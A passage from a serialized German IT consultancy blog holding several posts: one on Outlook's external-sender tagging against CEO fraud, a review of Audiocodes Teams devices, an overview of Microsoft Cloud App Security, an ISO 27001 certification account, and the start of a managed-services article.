sich um einen externen Angreifer handelt. Abhilfe schafft Microsoft nun über eine Integration für Exchange Online in Verbindung mit modernen Clients.",[353,6844,6845],{},"Mail bleibt trotz aller modernen Schutzmaßnahmen, wie sie beispielsweise die Microsoft 365 E5 Suite bietet, ein beliebtes und oft lohnendes Angriffsziel. Hat eine E-Mail erst einmal die technischen Hürden überwunden, ist sie oft so gut gestaltet, dass es für den Anwender schwierig, wenn nicht gar unmöglich ist, zu erkennen, dass sie nicht von einem Kollegen oder dem Vorgesetzten stammt, sondern von einem externen Angreifer gesendet wurde. Auch unsere Kollegen im Cloud Security Operations Center (CSOC) müssen sich oft mit solchen Fällen beschäftigen, nachdem der Schaden bereits entstanden ist. Beim sogenannten CEO-Fraud wird zum Beispiel der Anzeigename so präpariert, dass die eigentliche E-Mail-Adresse kaum auffällt, und auch die Antwortadresse wird geschickt verschleiert.",[3102,6847,6848,6849],{},"Christine Smith ",[6850,6851,6855,6856],"c",{"className":6852},[6853,6854],"smith@acme","com","\" ",[6857,6858],"attacker@fake",{"className":6859},[6854],[353,6861,6862],{},"Um ihren Benutzern zu helfen, sind einige Unternehmen dazu übergegangen, E-Mails von außerhalb des Unternehmens zu kennzeichnen, zum Beispiel in der Betreffzeile oder im Mailtext.",[353,6864,6865],{},[356,6866],{"alt":6867,"src":6868},"External Flag","https://res.cloudinary.com/c4a8/image/upload/blog/pics/img-flag-external-mail.png",[353,6870,6871],{},"Diese Methoden sind jedoch teilweise mit technischen Problemen behaftet und daher nicht uneingeschränkt zu empfehlen.",[353,6873,6874],{},"Inzwischen hat sich aber Microsoft dieses Themas angenommen und bietet nativ eine Integration für Exchange Online in Verbindung mit Outlook Mobile, Outlook für Mac und Outlook on the Web (OWA) an. Ein Update für Outlook für Windows wird im Juni erwartet, aktuell ist es im Beta Channel mit Version 2107 bereits integriert. Wir empfehlen, dass Exchange Online-Administratoren diese Kennzeichnung mit dem folgenden Befehl aktivieren:",[3102,6876,6877],{},"Set-ExternalInOutlook -Enabled $true",[353,6879,6880],{},"Die Bespiele aus OWA und Outlook zeigen, dass das Extern-Flag sichtbar ist, ohne dass die Mails geändert werden müssen.",[353,6882,6883],{},[356,6884],{"alt":6885,"src":6886},"External Flag OWA","https://res.cloudinary.com/c4a8/image/upload/blog/pics/img-flag-external-mail-owa.png",[353,6888,6889],{},"Derzeit scheint es so zu sein, dass diese Kennzeichnung nur aktiv wird, wenn Exchange Online die E-Mails aus dem Internet empfängt und nicht von Exchange On-Premises.",[353,6891,6892,6895,6896],{},[433,6893,6894],{},"Referenz:","\nExchange Team Blog: ",[374,6897,6900],{"href":6898,"rel":6899},"https://techcommunity.microsoft.com/t5/exchange-team-blog/native-external-sender-callouts-on-email-in-outlook/ba-p/2250098",[378],"Native external sender callouts on email in Outlook",{"title":402,"searchDepth":403,"depth":403,"links":6902},[],{"categories":6904,"blogtitlepic":6905,"socialimg":6906,"customExcerpt":6842},[534],"head-external-mail-hack","https://res.cloudinary.com/c4a8/image/upload/blog/heads/head-external-mail-hack.jpg","2021-06-10","/posts/2021-06-10-external-flag-for-outlook-mails",{"title":6835,"description":6842},"posts/2021-06-10-external-flag-for-outlook-mails",[534,6912,422,6913,6914,1117],"Exchange Online","Outlook","Hacking","rOz9B3g4b84rEkn_SOCqOHQkjsz4fVbYyHECgLWh-hQ",{"id":6917,"title":6918,"author":73,"body":6919,"cta":3,"description":402,"eventid":3,"extension":405,"hideInRecent":406,"layout":407,"meta":6999,"moment":7004,"navigation":415,"path":7005,"seo":7006,"stem":7007,"tags":7008,"webcast":406,"__hash__":7011},"content_de/posts/2021-06-17-audiocodes-review.md","Audiocodes Devices Review",{"type":350,"value":6920,"toc":6992},[6921,6925,6928,6931,6934,6937,6940,6945,6949,6952,6957,6961,6964,6967,6970,6975,6979,6982,6987,6989],[2548,6922,6924],{"id":6923},"audiocodes-c470hd","Audiocodes C470HD",[353,6926,6927],{},"Wie bei den anderen Android-Telefonen auch, ist die erste Inbetriebnahme des Gerätes nicht schwer. Android 9 als Betriebssystem und die passende Teams Android-App sind bereits vorinstalliert. Das Einloggen ist entsprechend einfach und funktioniert reibungslos. Das Display an der Seite des Telefons erinnert an ein etwas größeres Smartphone und die Trägheit der App liegt im normalen Bereich des Betriebssystems.",[353,6929,6930],{},"Was mir gut gefällt, ist der seitliche USB-Anschluss, an den man problemlos ein Headset anschließen kann. Auch während eines Gesprächs kann man das Headset einfach ein- und ausstecken und das Gerät schaltet den Ton entsprechend hin und her. Auch die Tasten des Headsets konnte ich dabei ohne Einschränkungen nutzen.\nDie Position des Hörers ist etwas ungünstig: Wenn das Kabel unter dem Hörer und der Tischplatte \"eingeklemmt\" ist, liegt der Hörer nicht wirklich gut auf. Der Hörer selbst hat Gewichte eingebaut, so dass er sich nicht zu leicht in der Hand anfühlt.",[353,6932,6933],{},"Meine Meeting-Teilnehmer waren von der Sprachqualität im Freisprechbetrieb nicht 100%ig überzeugt. Auf einer Skala von 1-10 wurde die Sprachqualität mit Headset mit 10 bewertet, beim C470HD am Hörer mit 7-8, im Freisprechmodus allerdings nur mit 6. Nicht ideal, aber verständlich, wenn kein echter HD-Codec dahinter steckt. Die Lautsprecherausgabe war für mich grundsätzlich in Ordnung, aber ein Jabra Speak hat natürlich etwas mehr Volumen im Klang.",[353,6935,6936],{},"Kurze Randnotiz: Es hat sehr lange gedauert, bis meine Kontakte auf dem Gerät verfügbar waren und im AAD gesucht werden konnten. Da braucht man ein wenig Geduld.",[353,6938,6939],{},"Alles in allem ist es ein nettes Gerät, das sicherlich in einigen Büros seinen Platz finden wird.",[353,6941,6942],{},[356,6943],{"alt":6924,"src":6944},"https://res.cloudinary.com/c4a8/image/upload/blog/pics/img-audiocodes-c470hd.png",[2548,6946,6948],{"id":6947},"audiocodes-rxvcam10","Audiocodes RXVCam10",[353,6950,6951],{},"Für den direkten Vergleich der USB-Webcam von Audiocodes habe ich die Logitech C930E herangezogen. Beide Webcams bieten Full-HD-Auflösung mit 1080p. Es gibt nur wenige Unterschiede in Größe und Format. Das Audiocodes-Gerät sieht mit seiner glänzenden schwarzen Klavierlackoberfläche hochwertiger aus, dafür hat die Logitech eine Objektivabdeckung, die das Objektiv vor Staub und den Benutzer vor unerwünschten Blicken schützt. Die Brennweiten sind bei beiden Geräten nahezu identisch. Auch bei Team-Meetings und Anrufen gibt es keine Unterschiede zwischen den Geräten. Windows 10 läuft problemlos auf beiden Geräten. Lediglich die Belichtung und die Farbtreue zeigen Unterschiede. Videos mit der Audiocodes RXVCam10 sind stark belichtet und wirken dadurch klar und hell, während Videos mit der Logitech C930E eine relativ hohe Farbtreue aufweisen.",[353,6953,6954],{},[356,6955],{"alt":6948,"src":6956},"https://res.cloudinary.com/c4a8/image/upload/blog/pics/img-audiocodes-rxv.png",[2548,6958,6960],{"id":6959},"audiocodes-rxv80-collaboration-bar","Audiocodes RXV80 Collaboration Bar",[353,6962,6963],{},"Die Android 9.0-basierte Collaboration Bar RXV80 von Audioocodes liefert ein sehr gutes Ergebnis. Die Einrichtung ist, wie erwartet, einfach. Auch die Eingabe der Login-Daten über die Fernbedienung bereitet keine Probleme. Allerdings tauchte die RXV80 in meinem Test nach der Anmeldung nicht direkt im Teams Admin Portal in der Geräteliste auf. Dies kann jedoch über die manuelle Provisionierung erzwungen werden. Dazu muss die MAC-Adresse im Portal eingetragen werden.",[353,6965,6966],{},"Der RXV80 ist bereits ohne zusätzliche Audiogeräte einsatzbereit. Der Ton wird über HDMI auf dem Bildschirm ausgegeben. Das eingebaute Mikrofon zeigt keine Probleme mit Echo oder Rückkopplung. Die Qualität ist abhängig vom Bildschirm. Auf einem Samsung-TV ist sie perfekt. Allerdings ist er auch sehr empfindlich und neigt manchmal zum Übersteuern. In einem 38 Quadratmeter großen Raum und einem Abstand von knapp 4 Metern zum Standpunkt ist es möglich, leise zu sprechen, um eine optimale Übertragung zu erreichen. Wird dagegen, wie es bei Konferenzen manchmal der Fall ist, besonders laut und deutlich gesprochen, kommt ein \"kratziges\" Rauschen hinzu. Dieses wird dann im weiteren Verlauf dynamisch angepasst. Lautes Lachen oder laute Äußerungen sind ohne dieses Geräusch. Insgesamt muss darauf geachtet werden, dass mit dem RXV80 ruhig und leise gesprochen wird, dann ist das Ergebnis erstklassig.",[353,6968,6969],{},"Die Kamera liefert ein sehr gutes Bild, es gibt keine Probleme mit Pixeln oder ähnlichem. Nur bei der Farbtreue gibt es ein paar Punkte Abzug. Hier verwendet die Kamera, ähnlich wie die RXVCam10, einen sehr hohen Weißanteil zur Aufhellung der Farben. Das lässt viele Farben heller und steriler erscheinen. Allerdings sieht man den Unterschied nur im Vergleich zu anderen Kameras. Die Helligkeit ist keineswegs störend. Die Bedienung mit der Fernbedienung ist selbsterklärend. Nur die Taste zum Beenden eines Anrufs hat keine Funktion, so dass ich mit der Maus über den Bildschirm zur Auflegen-Taste navigieren muss, um einen Anruf zu beenden. Ob dies ein Software- oder Hardwareproblem ist, habe ich nicht weiter untersucht. Etwas gewöhnungsbedürftig ist das ständige Aufleuchten der LEDs am RXV80. Grün, wenn er im Leerlauf ist und keine Kamera aktiv ist, und rot, wenn die Kamera aktiv ist.",[353,6971,6972],{},[356,6973],{"alt":6960,"src":6974},"https://res.cloudinary.com/c4a8/image/upload/blog/pics/img-audiocodes-collab-bar.png",[2548,6976,6978],{"id":6977},"audiocodes-rxv100-teams-room-system","Audiocodes RXV100 Teams Room System",[353,6980,6981],{},"Der RXV100 basiert auf dem Lenovo SmartHub500 mit einer auf einem Monitor platzierten Audiocodes RXVCam50 4K-USB-Kamera. Es können aber auch andere Audiogeräte verwendet werden. Die Einrichtung ist einfach. Wenn der SmartHub AD-joined werden soll, muss der Wizzard durchlaufen werden. In meinem Test habe ich das Gerät in der Arbeitsgruppe belassen und nur die Verwaltung über Teams Admin Center und Intune genutzt. Auch hier wurde Log Analytics in Azure verwendet, um Daten vom Gerät zu sammeln. Alles funktioniert hier reibungslos.In einer reinen Teams-Umgebung sollte bei der Ersteinrichtung darauf geachtet werden, in welchem Modus der MTR startet, damit Teams der primäre Client ist. In Online-Umgebungen ist außerdem darauf zu achten, dass Modern Authentication aktiviert ist, da sich das Gerät sonst nicht mit Exchange Online verbinden kann. Das Touch-Display des SmartHub reagiert zuverlässig und genau. Auch die Näherungserkennung funktioniert verlässlich und lässt den MTR bei Betreten aufwecken. Meeting Join, etc. funktioniert ebenfalls reibungslos. Die Audioeingabe und -ausgabe erfolgt durch den SmartHub selbst und ist sehr gut abgestimmt. Die Qualität ist durchweg sehr gut und klar. Sowohl leise als auch laute Gespräche werden optimal übertragen, auch im Raum. Vom Bild der RXVCam50 war ich sehr angetan. Die Qualität ist sehr gut, und die Verfolgung von Personen im Raum funktioniert einwandfrei. Der Autofokus arbeitet gut, zeigt aber Schwächen in den seitlichen Randbereichen. Wenn sich nur eine Person im Raum befindet und diese ganz am Ende des Kamerawinkels und weit (~6m) von der Kamera entfernt ist, kann man die Schwäche sehen. Kehrt man in den zentraleren Bereich des Bildes zurück, korrigiert der Autofokus wieder alles. Die Farbtreue ist absolut gegeben. Hier wird der Unterschied zur RXV80 und RXVCam10 deutlich, die beide im Vergleich viel heller sind und die Farben blass erscheinen lassen. Das Anschlusskabel vom SmartHub gefällt. Das Flachbandkabel zwischen dem Gerät und der Anschlussbox sorgt für einen aufgeräumten Konferenztisch.",[353,6983,6984],{},[356,6985],{"alt":6978,"src":6986},"https://res.cloudinary.com/c4a8/image/upload/blog/pics/audiocodes-room-system.png",[2548,6988,1088],{"id":1087},[353,6990,6991],{},"Alle Audiocodes-Geräte können problemlos eingeführt und verwendet werden. Es gab keine größeren Stolpersteine oder ähnliches. Die Konfiguration war ein Kinderspiel, wobei sich die Teams-App hier natürlich bemerkbar macht. Die Haptik aller Geräte ist absolut vorzeigbar und sie können in allen Bereichen ohne Bedenken eingesetzt werden. Solange keine Zugangskontrollen oder Netzwerke im Weg sind, sollte jeder Teams-Anwender mit einer kurzen Anleitung in der Lage sein, diese Geräte für sich selbst einzurichten.",{"title":402,"searchDepth":403,"depth":403,"links":6993},[6994,6995,6996,6997,6998],{"id":6923,"depth":403,"text":6924},{"id":6947,"depth":403,"text":6948},{"id":6959,"depth":403,"text":6960},{"id":6977,"depth":403,"text":6978},{"id":1087,"depth":403,"text":1088},{"categories":7000,"blogtitlepic":7001,"socialimg":7002,"customExcerpt":7003},[534],"head-audiocodes-review","https://res.cloudinary.com/c4a8/image/upload/blog/heads/head-audiocodes-review.jpg","Audiocodes hat mir mehrere Geräte für einen Test zur Verfügung gestellt. Ich habe sie alle eingerichtet und getestet. Hier ist eine kurze Zusammenfassung meiner Ergebnisse.","2021-06-17","/posts/2021-06-17-audiocodes-review",{"title":6918,"description":402},"posts/2021-06-17-audiocodes-review",[534,964,422,964,7009,7010],"Calling","Audiocodes","lVU9GF7nrn07eVPuqFUtPPMOpHm4SmiWqtCcr8nTkps",{"id":7013,"title":7014,"author":7015,"body":7016,"cta":3,"description":7165,"eventid":3,"extension":405,"hideInRecent":406,"layout":407,"meta":7166,"moment":7171,"navigation":415,"path":7172,"seo":7173,"stem":7174,"tags":7175,"webcast":406,"__hash__":7177},"content_de/posts/2021-09-09-mcas.md","Microsoft Cloud App Security (MCAS)",[24,102],{"type":350,"value":7017,"toc":7156},[7018,7026,7030,7033,7039,7042,7048,7052,7055,7059,7070,7076,7080,7083,7087,7090,7094,7097,7100,7103,7109,7112,7115,7119],[353,7019,7020,7021,7025],{},"In unserem ",[374,7022,558],{"href":7023,"rel":7024},"https://youtu.be/dgFF0n_1wGs",[378]," haben wir bereits einen ersten Einblick in MCAS gegeben und uns dabei drei Fragen gestellt: Was ist MCAS, warum sollte ich MCAS einsetzen und wie starte ich mit MCAS? MCAS ist facettenreich und eine Stunde reichte nicht aus, um auf alle Aspekte einzugehen. Daher möchten wir hier ein Recap mit weiteren Inhalten und Antworten geben.",[2548,7027,7029],{"id":7028},"was-ist-mcas","Was ist MCAS?",[353,7031,7032],{},"Was MCAS ist und was mit MCAS erreicht wird, lässt sich sehr gut an der Architektur von MCAS zeigen. Durch das Sammeln und Analysieren von Daten (Cloud Discovery) bekommen wir einen Einblick, welche Anwendungen im Unternehmen genutzt werden und wie die Nutzung erfolgt. Durch Threat Intelligence kann anomales Verhalten, wie „rouge admin activities“ oder kompromittierte Benutzer, festgestellt werden.",[353,7034,7035,7036,456],{},"Daneben kann MCAS als Reverse Proxy fungieren. Anders als bei klassischen Proxys sitzt MCAS dabei nicht in unserem Rechenzentrum vor den Applikationen, sondern zwischen dem Authentifizierungsprovider und der Cloud Anwendung. Als Reverse Proxy kann MCAS dann die Verbindung überwachen und die Sessions limitieren ",[433,7037,7038],{},"(Conditional Access App Control)",[353,7040,7041],{},"Dank den App Connectors lassen sich neben den Microsoft Cloud Anwendungen (Office 365 und Azure) auch viele weitere 3rd Party Anwendungen verbinden. So können wir wichtige Informationen wie Benutzeraktivitäten, administrative Aktivitäten, Konfigurationen und Datenablage auslesen. Diese Informationen werden auch durch Threat Intelligence ausgewertet. Bei verdächtigen Aktivitäten werden Alarme ausgelöst und es können Methoden aufgerufen werden, um z.B. einen Benutzer zu sperren.",[353,7043,7044],{},[356,7045],{"alt":7046,"src":7047},"MCAS","https://res.cloudinary.com/c4a8/image/upload/v1631204387/blog/pics/mcas-img-01.jpg",[2548,7049,7051],{"id":7050},"warum-sollte-ich-mcas-nutzen","Warum sollte ich MCAS nutzen?",[353,7053,7054],{},"Mit dem Weg in die Cloud ändern sich die Strategien und Systeme zum Schutz der einzelnen Entitäten. Während wir uns bisher stark auf die Sicherheit unserer Perimeter konzentriert haben, müssen wir diesen Schutz jetzt auf Benutzern, Endgeräte, Daten und Anwendungen verlagern. Genau hier ist oftmals ein CASB die richtige Lösung. In der Praxis sehen wir vor allem diese drei Leitmotive für die Nutzung:",[629,7056,7058],{"id":7057},"ich-möchte-verantwortung-für-alle-genutzten-services-übernehmen","Ich möchte Verantwortung für alle genutzten Services übernehmen!",[353,7060,7061,7062,7065,7066,7069],{},"Mit MCAS bekommen wir dank Cloud Discovery einen genauen Einblick in die Nutzung von Diensten. Neben dem Erkennen, welche Dienste genutzt werden, können diese Dienste auch durch den Cloud App Catalog hinsichtlich Sicherheit und Governance bewertet werden. Wenn wir feststellen, was genutzt wird, können wir diese Dienste erlauben und verwalten ",[433,7063,7064],{},"(sanctioned apps)"," oder sie sperren, wenn mit ihrer Nutzung Risiken verbunden sind ",[433,7067,7068],{},"(unsanctioned apps)",". Zum Blockieren von Apps empfehlen wir den Einsatz und die Integration von Microsoft Defender for Endpoint.",[353,7071,7072],{},[356,7073],{"alt":7074,"src":7075},"Use Cases","https://res.cloudinary.com/c4a8/image/upload/v1631204735/blog/pics/mcas-img-02.jpg",[629,7077,7079],{"id":7078},"ich-möchte-ein-flexibles-access-management-für-unsere-dienste-bereitstellen","Ich möchte ein flexibles Access Management für unsere Dienste bereitstellen!",[353,7081,7082],{},"Alle freigegebenen Anwendungen, Sanctioned Apps, können durch MCAS überwacht werden, um einen sicheren Betrieb zu gewährleisten. Dabei kann MCAS als Reverse Proxy den Zugang steuern und Sitzungen mit potentiell höherem Risiko limitieren. Dies ermöglicht Szenarien, die eine sichere Einbindung von Privatgeräten und Gästen erlauben.",[629,7084,7086],{"id":7085},"ich-möchte-die-sicherheit-der-cloud-apps-erhöhen-und-automatisieren","Ich möchte die Sicherheit der Cloud Apps erhöhen und automatisieren!",[353,7088,7089],{},"SaaS Anwendungen sind in ihrer Konfiguration und Überwachung häufig eingeschränkt. In manchen SaaS Anwendungen lassen sich zwar Daten ablegen, verfügen aber über keinen Virenschutz. Ebenso auditieren viele Anwendungen die Benutzeraktivitäten, werten sie aber nicht nach Anomalien aus. Genau diese Lücken, z.B. im Bereich Threat Protection, füllen wir mit MCAS aus.",[2548,7091,7093],{"id":7092},"wie-starte-ich-mit-mcas","Wie starte ich mit MCAS?",[353,7095,7096],{},"MCAS ist Teil der M365 Defender Suite und kann vollumfänglich mit Microsoft 365 E5 Security Lizenzen genutzt werden. Aktuell gibt es auch eine Standalone Lizenz von MCAS. Außerdem ist es möglich über ein „scoped deployment“ nur den Teil der Benutzer zu lizenzieren, der durch MCAS geschützt werden soll. Da eine von MCAS größten Stärken jedoch die hohe Integration mit den anderen M365 Defender Produkten ist, empfehlen wir dringend, diese gemeinsam zu lizenzieren und einzusetzen.",[353,7098,7099],{},"Zu Beginn müssen die Informationen aus den verwendeten Cloud Anwendungen durch MCAS eingesammelt werden. Dies wird durch vorgefertigte App Connectors ermöglicht. Anschließend können die persönlichen Use Cases abgebildet werden. Die Use Cases Cloud Discovery und Conditional Access App Control können Sie sich in der Aufzeichnung unseres Webcast Fridays noch einmal ansehen.",[353,7101,7102],{},"Die von Microsoft bereitgestellten Alert Policies können zu einer sehr hohen Anzahl von Warnungen führen, vor allem am Anfang. Hier müssen wir uns leider durchkämpfen und die Richtlinien nach persönlichem Bedarf anpassen.",[353,7104,7105],{},[356,7106],{"alt":7107,"src":7108},"Timeline","https://res.cloudinary.com/c4a8/image/upload/v1631205090/blog/pics/mcas-img-03.jpg",[353,7110,7111],{},"Ein weiterer wichtiger Punkt ist das Thema der Datenaufzeichnung in MCAS. Die dort einsehbaren Daten werden nicht durch MCAS erhoben, sondern nur dargestellt und ausgewertet. Das bedeutet, dass MCAS auf bestehende Betriebsvereinbarungen aufbauen kann. Sollte es die Situation dennoch erfordern, bietet MCAS die Möglichkeit, die Daten zu Users und Devices zu anonymisieren. Unabhängig davon ist ein Rollenkonzept für MCAS erforderlich, um sicherzustellen, dass nur berechtigte Personen Zugriff auf die Daten haben.",[353,7113,7114],{},"Da es beim Thema Security auf eine ganzheitliche Betrachtung ankommt, empfehlen wir, auf die Möglichkeiten der Anonymisierung und des Scoped Deployments abzusehen, um bessere Einblicke und mehr Handlungsspielraum im Sicherheitsbetrieb zu ermöglichen.",[4208,7116,7118],{"id":7117},"weiterführende-links","Weiterführende Links",[367,7120,7121,7128,7135,7142,7149],{},[370,7122,7123],{},[374,7124,7127],{"href":7125,"rel":7126},"https://www.youtube.com/watch?v=dgFF0n_1wGs",[378],"Demystifying Microsoft Cloud App Security (MCAS) - YouTube",[370,7129,7130],{},[374,7131,7134],{"href":7132,"rel":7133},"https://docs.microsoft.com/en-us/cloud-app-security/",[378],"Microsoft Cloud App Security documentation - Microsoft Docs",[370,7136,7137],{},[374,7138,7141],{"href":7139,"rel":7140},"https://docs.microsoft.com/en-us/cloud-app-security/cloud-discovery-anonymizer",[378],"Anonymize user data in Cloud App Security - Microsoft Docs",[370,7143,7144],{},[374,7145,7148],{"href":7146,"rel":7147},"https://docs.microsoft.com/en-us/cloud-app-security/scoped-deployment",[378],"Scope your Microsoft Cloud App Security deployment - Microsoft Docs",[370,7150,7151],{},[374,7152,7155],{"href":7153,"rel":7154},"https://chris-brumm.medium.com/learn-how-to-enable-safer-selling-in-salesforce-with-microsoft-cloud-app-security-part-1-98082b1604d6",[378],"Learn how to enable safer selling in Salesforce with Microsoft Cloud App Security - Chris Blog",{"title":402,"searchDepth":403,"depth":403,"links":7157},[7158,7159,7164],{"id":7028,"depth":403,"text":7029},{"id":7050,"depth":403,"text":7051,"children":7160},[7161,7162,7163],{"id":7057,"depth":704,"text":7058},{"id":7078,"depth":704,"text":7079},{"id":7085,"depth":704,"text":7086},{"id":7092,"depth":403,"text":7093},"In unserem Webcast Friday haben wir bereits einen ersten Einblick in MCAS gegeben und uns dabei drei Fragen gestellt: Was ist MCAS, warum sollte ich MCAS einsetzen und wie starte ich mit MCAS? MCAS ist facettenreich und eine Stunde reichte nicht aus, um auf alle Aspekte einzugehen. Daher möchten wir hier ein Recap mit weiteren Inhalten und Antworten geben.",{"categories":7167,"blogtitlepic":7168,"socialimg":7169,"customExcerpt":7170},[1117],"head-mcas","blog/heads/head-mcas.jpg","Mit MCAS hat Microsoft einen eigenen CASB zum Schutz von Benutzern, Daten und SaaS Anwendungen entwickelt. Ein CASB, Cloud Access Security Broker, sitzt per Definition zwischen Benutzern und Cloud Anwendungen, um alle Aktivitäten zu überwachen und Sicherheitsrichtlinien durchzusetzen. Mit MCAS können wir genau dieses Monitoring und noch einige weitere Use Cases abdecken.","2021-09-09","/posts/2021-09-09-mcas",{"title":7014,"description":7165},"posts/2021-09-09-mcas",[1117,7046,3295,7046,7176],"M365Security","LNYMGj4a8r6Gc11jIoeHcuFjY1Ex8CfpCgO-j7hEbS4",{"id":7179,"title":7180,"author":7181,"body":7182,"cta":3,"description":402,"eventid":3,"extension":405,"hideInRecent":406,"layout":407,"meta":7234,"moment":7239,"navigation":415,"path":7240,"seo":7241,"stem":7242,"tags":7243,"webcast":406,"__hash__":7247},"content_de/posts/2022-01-19-wir-sind-zertifziert.md","Erfolgreich ISO 27001 zertifiziert - in nur 10 Monaten",[109],{"type":350,"value":7183,"toc":7229},[7184,7188,7191,7194,7198,7201,7204,7207,7216,7219,7223,7226],[2548,7185,7187],{"id":7186},"worum-geht-es-bei-iso-27001-zertifizierung","Worum geht es bei ISO 27001 Zertifizierung?",[353,7189,7190],{},"Ein Informationssicherheitsmanagementsystem, kurz ISMS, befasst sich weniger mit der Technik als mit der Beschreibung von Regeln und organisatorischen Maßnahmen für ein ganzheitliches Unternehmens- und IT-Sicherheitsmanagement. Die Umsetzung basiert wiederum auf technischen und organisatorischen Regeln in den zuvor definierten Bereichen (in unserem Fall: Managed Services und Produktentwicklung).",[353,7192,7193],{},"Unser Ziel war es, bis Ende 2021 in den oben genannten Bereichen nach ISO 27001 zertifiziert zu sein - in nur 10 Monaten! Dafür wurden wir von verschiedenen Seiten belächelt, denn die Einführung eines ISMS und die Zertifizierung bedeuten einen nicht unerheblichen Zeitaufwand.",[2548,7195,7197],{"id":7196},"welche-art-der-umsetzung-haben-wir-gewählt","Welche Art der Umsetzung haben wir gewählt?",[353,7199,7200],{},"Als Unternehmen denken wir ein wenig anders. Wir wollten das Rad nicht neu erfinden, sondern uns auf Menschen verlassen, die das Begleiten eines solchen Prozesses als ihre Kernkompetenz ansehen. Deshalb haben wir uns für ein System \"von der Stange\" entschieden, bei dem der Rahmen bereits vorgegeben war und wir ihn nur noch mit Leben füllen mussten.",[353,7202,7203],{},"Wie bereits erwähnt, basiert die Umsetzung auf technischen und organisatorischen Regeln. Hier spielen uns unsere 100 % Cloud-Strategie und unser Future Workplace Blueprint in die Hände. Denn eine unserer Maximen lautet \"Eat your own dog food\". Also leben wir in der Cloud und der Blueprint wird auch in unserem Unternehmen umgesetzt. So konnten viele der im Framework geforderten Themen auf den Blueprint verwiesen werden oder Anforderungen damit beantwortet werden.",[353,7205,7206],{},"Das ISMS wirft auch einen Blick auf den Bereich der Unternehmenssicherheit. Es prüft unter anderem, wie mit geschäftskritischen Situationen umgegangen wird, z.B. bei Strom- oder Internetausfällen. In unserem Fall gab es daher während des Zertifizierungsprozesses einige spannende Diskussionen mit dem Auditor, da uns diese Themen nicht direkt betreffen. Denn dank unseres 100 % Cloud-Ansatzes lautet unser Motto: \"Strom weg, egal - dann gehe ich dorthin, wo es Strom gibt. Kein Internet, egal - Personal Hotspot auf dem Mobiltelefon, ab ins Café um die Ecke oder, ganz langweilig, ins Homeoffice.\"",[353,7208,7209,7210,7215],{},"Die ISO 27001 Zertifizierung umfasst auch eine Begutachtung der Geschäftsräume und der Infrastruktur (Rechenzentrum). Dies kann bis zu einem Tag dauern. In unserem Fall war die Prüfung innerhalb einer Stunde abgeschlossen. Warum? Ganz einfach: 100 % Cloud. Und da wir die Microsoft Cloud nutzen, ",[374,7211,7214],{"href":7212,"rel":7213},"https://docs.microsoft.com/de-de/compliance/regulatory/offering-iso-27001",[378],"die bereits ISO 27001 zertifiziert ist",", war auch dieser Punkt schnell erledigt.",[353,7217,7218],{},"Dies warf jedoch weitere Fragen auf. Wenn sich die gesamte Infrastruktur in der Cloud befindet, wie wird dann der Zugang gesichert und der Zugriff überwacht? Hier konnten wir allerdings wieder auf unseren Blueprint verweisen, der auch das Thema Conditional Access behandelt. In Sachen Überwachung konnten wir mit unserem glueckkanja CSOC Service überzeugen und letzte Zweifel ausräumen. So stand der endgültigen Zertifizierung nichts mehr im Wege.",[2548,7220,7222],{"id":7221},"welches-fazit-können-wir-also-ziehen","Welches Fazit können wir also ziehen?",[353,7224,7225],{},"Mit unserem technischen Wissen, das wir in unseren Blueprint gepackt haben, haben wir auch die Grundlage geschaffen, um auf der organisatorischen Seite zu überzeugen. So konnten wir die ISO 27001 Zertifizierung in sehr kurzer Zeit und mit überschaubarem Aufwand erreichen.",[353,7227,7228],{},"Fragen nach einem ISMS oder einer Zertifizierung können wir ab sofort guten Gewissens ankreuzen, wenn wir Anfragen zu Managed Services erhalten. Und auch Sie als Kunde können von unserem 100%igen Cloud-Ansatz profitieren, denn der standardisierte Ansatz kann auch Ihnen in Ihrem Unternehmen bei Themen wie Informations- und Geschäftssicherheit helfen.",{"title":402,"searchDepth":403,"depth":403,"links":7230},[7231,7232,7233],{"id":7186,"depth":403,"text":7187},{"id":7196,"depth":403,"text":7197},{"id":7221,"depth":403,"text":7222},{"categories":7235,"blogtitlepic":7236,"socialimg":7237,"customExcerpt":7238},[410],"head-iso-27001","blog/heads/head-iso-27001.jpg","Auf technischer Ebene beweisen wir unseren Kunden jeden Tag, dass wir ihnen als Cloud Managed Service Provider erstklassigen Support bieten; nun galt es zu prüfen, ob auch die organisatorischen Voraussetzungen erfüllt sind. Denn wir bei glueckkanja erhalten immer mehr Kundenanfragen, die einen Nachweis darüber wünschen, dass unser Unternehmen branchenübliche Prozesse für die Informationssicherheit etabliert hat. Um diesem Wunsch nachzukommen, haben wir uns ISO 27001 zertifizieren lassen.","2022-01-19","/posts/2022-01-19-wir-sind-zertifziert",{"title":7180,"description":402},"posts/2022-01-19-wir-sind-zertifziert",[410,1117,7244,7245,7246],"ISO 27001","Information Security","Certification","kkaRNfUBbQt1s4jAwSAZckeh54fIV6-SVE4oi7Qzvgw",{"id":7249,"title":7250,"author":7251,"body":7252,"cta":3,"description":7345,"eventid":3,"extension":405,"hideInRecent":406,"layout":407,"meta":7346,"moment":7351,"navigation":415,"path":7352,"seo":7353,"stem":7354,"tags":7355,"webcast":406,"__hash__":7359},"content_de/posts/2022-02-28-managed-services-teil-1.md","Entdecken Sie das Potenzial von Managed Services",[10],{"type":350,"value":7253,"toc":7342},[7254,7265,7268,7274,7278,7284,7290,7293,7299,7303],[353,7255,7256,7257,7261,7262,456],{},"Eine aktuelle Studie von Flexera",[7258,7259,7260],"span",{},"¹"," zeigt, dass die Nutzung von Public Cloud Solutions seit der SARS-CoV-2 Pandemie deutlich gestiegen ist. Dabei nennt die Studie Kosteneinsparungen und erhöhte Agilität als Hauptgründe für den Anstieg. Gleichzeitig vereinfacht die Nutzung von Public Cloud Solutions die Finanzplanung, da die anfallenden Kosten leichter geplant und zugewiesen werden können. Aus der Studie geht auch hervor, dass mehr als 61% der Befragten bereits Managed Service Provider (MSP) für die Verwaltung von Public Cloud Lösungen beauftragen",[7258,7263,7264],{},"²",[353,7266,7267],{},"Das rasante Wachstum der Public Cloud und die zunehmende Komplexität der IT-Landschaft führen dazu, dass die Nachfrage nach Managed Services in immer mehr Unternehmen steigt. Das liegt vor allem daran, dass das Know-how und das erforderliche Fachpersonal intern nicht rechtzeitig aufgebaut werden können. Somit mangelt es an Wissen über Cloud Services oder über die Abwehr von Cyberangriffen.",[353,7269,7270,7271,456],{},"Für Service Provider ergibt sich daraus die Möglichkeit, den Betrieb von Services auf Basis von Amazon Web Services, Azure oder einer anderen Plattform als Managed Service anzubieten. Um dieser aktuellen Entwicklung gerecht zu werden, hat die glueckkanja AG ihr Angebot als Cloud Managed Service Provider für 